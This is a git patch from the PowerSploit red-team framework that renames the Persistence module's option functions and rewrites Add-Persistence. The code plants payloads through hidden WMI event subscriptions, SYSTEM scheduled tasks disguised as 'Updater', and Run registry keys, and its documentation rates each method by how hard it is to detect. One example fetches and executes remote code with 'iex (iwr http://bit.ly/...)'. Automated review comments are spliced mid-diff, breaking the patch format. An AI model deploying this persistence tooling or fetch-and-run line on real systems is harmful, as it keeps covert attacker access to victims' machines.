From bbd382e52a131b3e876ee145d7abd834cdfb5d0c Mon Sep 17 00:00:00 2001
From: mattifestation
Date: Sun, 23 Feb 2014 10:31:24 -0500
Subject: #31 Persistence module function nouns are now singular

The function names New-UserPersistenceOption and New-ElevatedPersistenceOptionNew-ElevatedPersistenceOption now conform to PowerShell naming best practices.
---
Persistence/Add-Persistence.ps1 | 50 ++++----
Persistence/New-ElevatedPersistenceOption.ps1 | 170 +++++++++++++++++++++++++
Persistence/New-ElevatedPersistenceOptions.ps1 | 170 -------------------------
Persistence/New-UserPersistenceOption.ps1 | 128 +++++++++++++++++++
Persistence/New-UserPersistenceOptions.ps1 | 128 -------------------
Persistence/Persistence.psd1 | 4 +-
6 files changed, 325 insertions(+), 325 deletions(-)
create mode 100644 Persistence/New-ElevatedPersistenceOption.ps1
delete mode 100644 Persistence/New-ElevatedPersistenceOptions.ps1
create mode 100644 Persistence/New-UserPersistenceOption.ps1
delete mode 100644 Persistence/New-UserPersistenceOptions.ps1
(limited to 'Persistence')

diff --git a/Persistence/Add-Persistence.ps1 b/Persistence/Add-Persistence.ps1
index 27d7ba7..6b0e2de 100644
--- a/Persistence/Add-Persistence.ps1
+++ b/Persistence/Add-Persistence.ps1
@@ -8,7 +8,7 @@ function Add-Persistence
PowerSploit Function: Add-Persistence
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
- Required Dependencies: New-ElevatedPersistenceOptions, New-UserPersistenceOptions
+ Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption
Optional Dependencies: None

.DESCRIPTION

@@ -23,15 +23,15 @@ function Add-Persistence

Specifies the path to your payload.

-.PARAMETER ElevatedPersistenceOptions
+.PARAMETER ElevatedPersistenceOption

Specifies the trigger for the persistent payload if the target is running elevated.
- You must run New-ElevatedPersistenceOptions to generate this argument.
+ You must run New-ElevatedPersistenceOption to generate this argument.

-.PARAMETER UserPersistenceOptions
+.PARAMETER UserPersistenceOption

Specifies the trigger for the persistent payload if the target is not running elevated.
- You must run New-UserPersistenceOptions to generate this argument.
+ You must run New-UserPersistenceOption to generate this argument.

.PARAMETER PersistenceScriptName

@@ -71,9 +71,9 @@ function Add-Persistence

.EXAMPLE

- C:\PS>$ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM'
- C:\PS>$UserOptions = New-UserPersistenceOptions -Registry -AtLogon
- C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -Verbose
+ C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+ C:\PS>$UserOptions = New-UserPersistenceOption -Registry -AtLogon
+ C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose

Description
-----------
@@ -82,9 +82,9 @@ function Add-Persistence
.EXAMPLE

C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
- C:\PS>$ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle
- C:\PS>$UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle
- C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
+ C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+ C:\PS>$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+ C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1

Description
-----------
@@ -108,10 +108,10 @@ function Add-Persistence
$FilePath,

[Parameter( Mandatory = $True )]
- $ElevatedPersistenceOptions,
+ $ElevatedPersistenceOption,

[Parameter( Mandatory = $True )]
- $UserPersistenceOptions,
+ $UserPersistenceOption,

[ValidateNotNullOrEmpty()]
[String]
@@ -136,12 +136,12 @@ function Add-Persistence

#region Validate arguments

- if ($ElevatedPersistenceOptions.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOptions')
+ if ($ElevatedPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOption')
{
throw 'You provided invalid elevated persistence options.'
}

- if ($UserPersistenceOptions.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOptions')
+ if ($UserPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOption')
{
throw 'You provided invalid user-level persistence options.'
}
@@ -171,9 +171,9 @@ function Add-Persistence
$RemovalScriptFile = "$($Path)\$($Leaf)"
}

- if ($PSBoundParameters['Path'])
+ if ($PSBoundParameters['FilePath'])
{
- Get-ChildItem $Path -ErrorAction Stop | Out-Null
+ Get-ChildItem $FilePath -ErrorAction Stop
$Script = [IO.File]::ReadAllText((Resolve-Path $Path))
}
else
@@ -216,7 +216,7 @@ function Add-Persistence
#region Process persistence options

# Begin processing elevated persistence options
- switch ($ElevatedPersistenceOptions.Method)
+ switch ($ElevatedPersistenceOption.Method)
{
'PermanentWMI'
{
@@ -226,7 +226,7 @@ Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "nam
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match 'Updater'} | Remove-WmiObject
}

- switch ($ElevatedPersistenceOptions.Trigger)
+ switch ($ElevatedPersistenceOption.Trigger)
{
'AtStartup'
{
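Review bot: `$Script = [IO.File]::ReadAllText((Resolve-Path $Path))` still reads `$Path` although the guard and the existence check on the two lines above were switched to `$FilePath`; judging from the context line `$RemovalScriptFile = "$($Path)\$($Leaf)"`, `$Path` appears to hold a directory, so the payload would be read from the wrong location or Resolve-Path would throw. The line should become `$Script = [IO.File]::ReadAllText((Resolve-Path $FilePath))`. Dropping `| Out-Null` from the Get-ChildItem call also lets the returned FileInfo object leak into the function's pipeline output, which matters because the second example in this file pipes `Add-Persistence ... -PassThru` straight into Out-EncodedCommand; keep it as `Get-ChildItem $FilePath -ErrorAction Stop | Out-Null` or assign the result to `$null`. The if/else this hunk changes continues past the end of the hunk.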
@@ -235,7 +235,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj

'Daily'
{
- $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOptions.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOptions.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`""
+ $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOption.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOption.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`""
}

default
@@ -250,7 +250,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
$CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"'
$ElevatedTriggerRemoval = "schtasks /Delete /TN Updater"

- switch ($ElevatedPersistenceOptions.Trigger)
+ switch ($ElevatedPersistenceOption.Trigger)
{
'AtLogon'
{
@@ -259,7 +259,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj

'Daily'
{
- $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOptions.Time.ToString('HH:mm:ss')) /TN Updater /TR "
+ $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "
}

'OnIdle'
@@ -291,18 +291,18 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
}

# Begin processing user-level persistence options
- switch ($UserPersistenceOptions.Method)
+ switch ($UserPersistenceOption.Method)
{
'ScheduledTask'
{
$CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"'
$UserTriggerRemoval = "schtasks /Delete /TN Updater"

- switch ($UserPersistenceOptions.Trigger)
+ switch ($UserPersistenceOption.Trigger)
{
'Daily'
{
- $UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOptions.Time.ToString('HH:mm:ss')) /TN Updater /TR "
+ $UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "
}

'OnIdle'
diff --git a/Persistence/New-ElevatedPersistenceOption.ps1 b/Persistence/New-ElevatedPersistenceOption.ps1
new file mode 100644
index 0000000..42a2437
--- /dev/null
+++ b/Persistence/New-ElevatedPersistenceOption.ps1
@@ -0,0 +1,170 @@
+function New-ElevatedPersistenceOption
+{
+<#
+.SYNOPSIS
+
+ Configure elevated persistence options for the Add-Persistence function.
+
+ PowerSploit Function: New-ElevatedPersistenceOption
+ Author: Matthew Graeber (@mattifestation)
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+.DESCRIPTION
+
+ New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
+
+.PARAMETER PermanentWMI
+
+ Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove.
+
+ Detection Difficulty: Difficult
+ Removal Difficulty: Difficult
+ User Detectable? No
+
+.PARAMETER ScheduledTask
+
+ Persist via a scheduled task.
+
+ Detection Difficulty: Moderate
+ Removal Difficulty: Moderate
+ User Detectable? No
+
+.PARAMETER Registry
+
+ Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.
+
+ Detection Difficulty: Easy
+ Removal Difficulty: Easy
+ User Detectable? Yes
+
+.PARAMETER AtLogon
+
+ Starts the payload upon any user logon.
+
+.PARAMETER AtStartup
+
+ Starts the payload within 240 and 325 seconds of computer startup.
+
+.PARAMETER OnIdle
+
+ Starts the payload after one minute of idling.
+
+.PARAMETER Daily
+
+ Starts the payload daily.
+
+.PARAMETER At
+
+ Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+
+.EXAMPLE
+
+ C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
+
+.EXAMPLE
+
+ C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
+
+.EXAMPLE
+
+ C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
+
+.LINK
+
+ http://www.exploit-monday.com
+#>
+
+ [CmdletBinding()] Param (
+ [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
+ [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
+ [Switch]
+ $PermanentWMI,
+
+ [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
+ [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
+ [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
+ [Switch]
+ $ScheduledTask,
+
+ [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]
+ [Switch]
+ $Registry,
+
+ [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
+ [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
+ [Switch]
+ $Daily,
+
+ [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
+ [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
+ [DateTime]
+ $At,
+
+ [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
+ [Switch]
+ $OnIdle,
+
+ [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
+ [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]
+ [Switch]
+ $AtLogon,
+
+ [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
+ [Switch]
+ $AtStartup
+ )
+
+ $PersistenceOptionsTable = @{
+ Method = ''
+ Trigger = ''
+ Time = ''
+ }
+
+ switch ($PSCmdlet.ParameterSetName)
+ {
+ 'PermanentWMIAtStartup'
+ {
+ $PersistenceOptionsTable['Method'] = 'PermanentWMI'
+ $PersistenceOptionsTable['Trigger'] = 'AtStartup'
+ }
+
+ 'PermanentWMIDaily'
+ {
+ $PersistenceOptionsTable['Method'] = 'PermanentWMI'
+ $PersistenceOptionsTable['Trigger'] = 'Daily'
+ $PersistenceOptionsTable['Time'] = $At
+ }
+
+ 'ScheduledTaskAtLogon'
+ {
+ $PersistenceOptionsTable['Method'] = 'ScheduledTask'
+ $PersistenceOptionsTable['Trigger'] = 'AtLogon'
+ }
+
+ 'ScheduledTaskOnIdle'
+ {
+ $PersistenceOptionsTable['Method'] = 'ScheduledTask'
+ $PersistenceOptionsTable['Trigger'] = 'OnIdle'
+ }
+
+ 'ScheduledTaskDaily'
+ {
+ $PersistenceOptionsTable['Method'] = 'ScheduledTask'
+ $PersistenceOptionsTable['Trigger'] = 'Daily'
+ $PersistenceOptionsTable['Time'] = $At
+ }
+
+ 'Registry'
+ {
+ $PersistenceOptionsTable['Method'] = 'Registry'
+ $PersistenceOptionsTable['Trigger'] = 'AtLogon'
+ }
+ }
+
+ $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable
+ $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOption'
+
+ Write-Output $PersistenceOptions
+}
diff --git a/Persistence/New-ElevatedPersistenceOptions.ps1 b/Persistence/New-ElevatedPersistenceOptions.ps1
deleted file mode 100644
index 5e04286..0000000
--- a/Persistence/New-ElevatedPersistenceOptions.ps1
+++ /dev/null
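Review bot: The second `.EXAMPLE`, `New-ElevatedPersistenceOption -Registry -AtStartup`, cannot bind: `$Registry` is declared only in the 'Registry' parameter set, whose mandatory trigger is `$AtLogon`, while `$AtStartup` is declared only in 'PermanentWMIAtStartup', so PowerShell rejects the combination instead of producing the Registry/AtLogon object that the `'Registry'` switch case builds. Change the example to `C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtLogon`. It would also help to say in `.PARAMETER At` that the value is only consumed together with -Daily, since `Time` stays the empty string for every other parameter set.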
@@ -1,170 +0,0 @@
-function New-ElevatedPersistenceOptions
-{
-<#
-.SYNOPSIS
-
- Configure elevated persistence options for the Add-Persistence function.
-
- PowerSploit Function: New-ElevatedPersistenceOptions
- Author: Matthew Graeber (@mattifestation)
- License: BSD 3-Clause
- Required Dependencies: None
- Optional Dependencies: None
-
-.DESCRIPTION
-
- New-ElevatedPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
-
-.PARAMETER PermanentWMI
-
- Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove.
-
- Detection Difficulty: Difficult
- Removal Difficulty: Difficult
- User Detectable? No
-
-.PARAMETER ScheduledTask
-
- Persist via a scheduled task.
-
- Detection Difficulty: Moderate
- Removal Difficulty: Moderate
- User Detectable? No
-
-.PARAMETER Registry
-
- Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.
-
- Detection Difficulty: Easy
- Removal Difficulty: Easy
- User Detectable? Yes
-
-.PARAMETER AtLogon
-
- Starts the payload upon any user logon.
-
-.PARAMETER AtStartup
-
- Starts the payload within 240 and 325 seconds of computer startup.
-
-.PARAMETER OnIdle
-
- Starts the payload after one minute of idling.
-
-.PARAMETER Daily
-
- Starts the payload daily.
-
-.PARAMETER At
-
- Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
-
-.EXAMPLE
-
- C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM'
-
-.EXAMPLE
-
- C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -Registry -AtStartup
-
-.EXAMPLE
-
- C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle
-
-.LINK
-
- http://www.exploit-monday.com
-#>
-
- [CmdletBinding()] Param (
- [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
- [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
- [Switch]
- $PermanentWMI,
-
- [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
- [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
- [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
- [Switch]
- $ScheduledTask,
-
- [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]
- [Switch]
- $Registry,
-
- [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
- [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
- [Switch]
- $Daily,
-
- [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
- [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
- [DateTime]
- $At,
-
- [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
- [Switch]
- $OnIdle,
-
- [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
- [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]
- [Switch]
- $AtLogon,
-
- [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
- [Switch]
- $AtStartup
- )
-
- $PersistenceOptionsTable = @{
- Method = ''
- Trigger = ''
- Time = ''
- }
-
- switch ($PSCmdlet.ParameterSetName)
- {
- 'PermanentWMIAtStartup'
- {
- $PersistenceOptionsTable['Method'] = 'PermanentWMI'
- $PersistenceOptionsTable['Trigger'] = 'AtStartup'
- }
-
- 'PermanentWMIDaily'
- {
- $PersistenceOptionsTable['Method'] = 'PermanentWMI'
- $PersistenceOptionsTable['Trigger'] = 'Daily'
- $PersistenceOptionsTable['Time'] = $At
- }
-
- 'ScheduledTaskAtLogon'
- {
- $PersistenceOptionsTable['Method'] = 'ScheduledTask'
- $PersistenceOptionsTable['Trigger'] = 'AtLogon'
- }
-
- 'ScheduledTaskOnIdle'
- {
- $PersistenceOptionsTable['Method'] = 'ScheduledTask'
- $PersistenceOptionsTable['Trigger'] = 'OnIdle'
- }
-
- 'ScheduledTaskDaily'
- {
- $PersistenceOptionsTable['Method'] = 'ScheduledTask'
- $PersistenceOptionsTable['Trigger'] = 'Daily'
- $PersistenceOptionsTable['Time'] = $At
- }
-
- 'Registry'
- {
- $PersistenceOptionsTable['Method'] = 'Registry'
- $PersistenceOptionsTable['Trigger'] = 'AtLogon'
- }
- }
-
- $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable
- $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOptions'
-
- Write-Output $PersistenceOptions
-}
diff --git a/Persistence/New-UserPersistenceOption.ps1 b/Persistence/New-UserPersistenceOption.ps1
new file mode 100644
index 0000000..38ef72d
--- /dev/null
+++ b/Persistence/New-UserPersistenceOption.ps1
@@ -0,0 +1,128 @@
+function New-UserPersistenceOption
+{
+<#
+.SYNOPSIS
+
+ Configure user-level persistence options for the Add-Persistence function.
+
+ PowerSploit Function: New-UserPersistenceOption
+ Author: Matthew Graeber (@mattifestation)
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+.DESCRIPTION
+
+ New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry.
+
+.PARAMETER ScheduledTask
+
+ Persist via a scheduled task.
+
+ Detection Difficulty: Moderate
+ Removal Difficulty: Moderate
+ User Detectable? No
+
+.PARAMETER Registry
+
+ Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.
+
+ Detection Difficulty: Easy
+ Removal Difficulty: Easy
+ User Detectable? Yes
+
+.PARAMETER AtLogon
+
+ Starts the payload upon any user logon.
+
+.PARAMETER OnIdle
+
+ Starts the payload after one minute of idling.
+
+.PARAMETER Daily
+
+ Starts the payload daily.
+
+.PARAMETER At
+
+ Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
+
+.EXAMPLE
+
+ C:\PS> $UserOptions = New-UserPersistenceOption -Registry -AtLogon
+
+.EXAMPLE
+
+ C:\PS> $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
+
+.LINK
+
+ http://www.exploit-monday.com
+#>
+
+ [CmdletBinding()] Param (
+ [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
+ [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
+ [Switch]
+ $ScheduledTask,
+
+ [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]
+ [Switch]
+ $Registry,
+
+ [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
+ [Switch]
+ $Daily,
+
+ [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
+ [DateTime]
+ $At,
+
+ [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
+ [Switch]
+ $OnIdle,
+
+ [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]
+ [Switch]
+ $AtLogon
+ )
+
+ $PersistenceOptionsTable = @{
+ Method = ''
+ Trigger = ''
+ Time = ''
+ }
+
+ switch ($PSCmdlet.ParameterSetName)
+ {
+ 'ScheduledTaskAtLogon'
+ {
+ $PersistenceOptionsTable['Method'] = 'ScheduledTask'
+ $PersistenceOptionsTable['Trigger'] = 'AtLogon'
+ }
+
+ 'ScheduledTaskOnIdle'
+ {
+ $PersistenceOptionsTable['Method'] = 'ScheduledTask'
+ $PersistenceOptionsTable['Trigger'] = 'OnIdle'
+ }
+
+ 'ScheduledTaskDaily'
+ {
+ $PersistenceOptionsTable['Method'] = 'ScheduledTask'
+ $PersistenceOptionsTable['Trigger'] = 'Daily'
+ $PersistenceOptionsTable['Time'] = $At
+ }
+
+ 'Registry'
+ {
+ $PersistenceOptionsTable['Method'] = 'Registry'
+ $PersistenceOptionsTable['Trigger'] = 'AtLogon'
+ }
+ }
+
+ $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable
+ $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOption'
+
+ Write-Output $PersistenceOptions
+}
diff --git a/Persistence/New-UserPersistenceOptions.ps1 b/Persistence/New-UserPersistenceOptions.ps1
deleted file mode 100644
index 3b33ffa..0000000
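Review bot: The `'ScheduledTaskAtLogon'` case in the switch is unreachable: no parameter in the Param block is declared in a 'ScheduledTaskAtLogon' set (`$ScheduledTask` only belongs to ScheduledTaskDaily and ScheduledTaskOnIdle, `$AtLogon` only to Registry), so `-ScheduledTask -AtLogon` fails parameter binding and the case is dead code. Either add `[Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]` to both `$ScheduledTask` and `$AtLogon`, as the elevated variant does, or delete the case. The `.DESCRIPTION` also says this user-level function configures "elevated persistence options"; it should read `New-UserPersistenceOption allows for the configuration of user-level persistence options.`. The `.PARAMETER AtLogon` wording "upon any user logon" presumably overstates an HKCU Run entry, which would only fire for the user whose hive it is written to — worth confirming and narrowing.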
--- a/Persistence/New-UserPersistenceOptions.ps1
+++ /dev/null
@@ -1,128 +0,0 @@
-function New-UserPersistenceOptions
-{
-<#
-.SYNOPSIS
-
- Configure user-level persistence options for the Add-Persistence function.
-
- PowerSploit Function: New-UserPersistenceOptions
- Author: Matthew Graeber (@mattifestation)
- License: BSD 3-Clause
- Required Dependencies: None
- Optional Dependencies: None
-
-.DESCRIPTION
-
- New-UserPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry.
-
-.PARAMETER ScheduledTask
-
- Persist via a scheduled task.
-
- Detection Difficulty: Moderate
- Removal Difficulty: Moderate
- User Detectable? No
-
-.PARAMETER Registry
-
- Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user.
-
- Detection Difficulty: Easy
- Removal Difficulty: Easy
- User Detectable? Yes
-
-.PARAMETER AtLogon
-
- Starts the payload upon any user logon.
-
-.PARAMETER OnIdle
-
- Starts the payload after one minute of idling.
-
-.PARAMETER Daily
-
- Starts the payload daily.
-
-.PARAMETER At
-
- Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
-
-.EXAMPLE
-
- C:\PS> $UserOptions = New-UserPersistenceOptions -Registry -AtLogon
-
-.EXAMPLE
-
- C:\PS> $UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle
-
-.LINK
-
- http://www.exploit-monday.com
-#>
-
- [CmdletBinding()] Param (
- [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
- [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
- [Switch]
- $ScheduledTask,
-
- [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]
- [Switch]
- $Registry,
-
- [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
- [Switch]
- $Daily,
-
- [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
- [DateTime]
- $At,
-
- [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
- [Switch]
- $OnIdle,
-
- [Parameter( ParameterSetName = 'Registry', Mandatory = $True )]
- [Switch]
- $AtLogon
- )
-
- $PersistenceOptionsTable = @{
- Method = ''
- Trigger = ''
- Time = ''
- }
-
- switch ($PSCmdlet.ParameterSetName)
- {
- 'ScheduledTaskAtLogon'
- {
- $PersistenceOptionsTable['Method'] = 'ScheduledTask'
- $PersistenceOptionsTable['Trigger'] = 'AtLogon'
- }
-
- 'ScheduledTaskOnIdle'
- {
- $PersistenceOptionsTable['Method'] = 'ScheduledTask'
- $PersistenceOptionsTable['Trigger'] = 'OnIdle'
- }
-
- 'ScheduledTaskDaily'
- {
- $PersistenceOptionsTable['Method'] = 'ScheduledTask'
- $PersistenceOptionsTable['Trigger'] = 'Daily'
- $PersistenceOptionsTable['Time'] = $At
- }
-
- 'Registry'
- {
- $PersistenceOptionsTable['Method'] = 'Registry'
- $PersistenceOptionsTable['Trigger'] = 'AtLogon'
- }
- }
-
- $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable
- $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOptions'
-
- Write-Output $PersistenceOptions
-}
diff --git a/Persistence/Persistence.psd1 b/Persistence/Persistence.psd1
index de97697..c793c69 100644
--- a/Persistence/Persistence.psd1
+++ b/Persistence/Persistence.psd1
@@ -31,7 +31,7 @@ CmdletsToExport = '*'
ModuleList = @(@{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'})

# List of all files packaged with this module
-FileList = 'Persistence.psm1', 'Persistence.psd1', 'Add-Persistence.ps1', 'New-ElevatedPersistenceOptions.ps1',
- 'New-UserPersistenceOptions.ps1', 'Usage.md'
+FileList = 'Persistence.psm1', 'Persistence.psd1', 'Add-Persistence.ps1', 'New-ElevatedPersistenceOption.ps1',
+ 'New-UserPersistenceOption.ps1', 'Usage.md'

}
--
cgit v1.2.3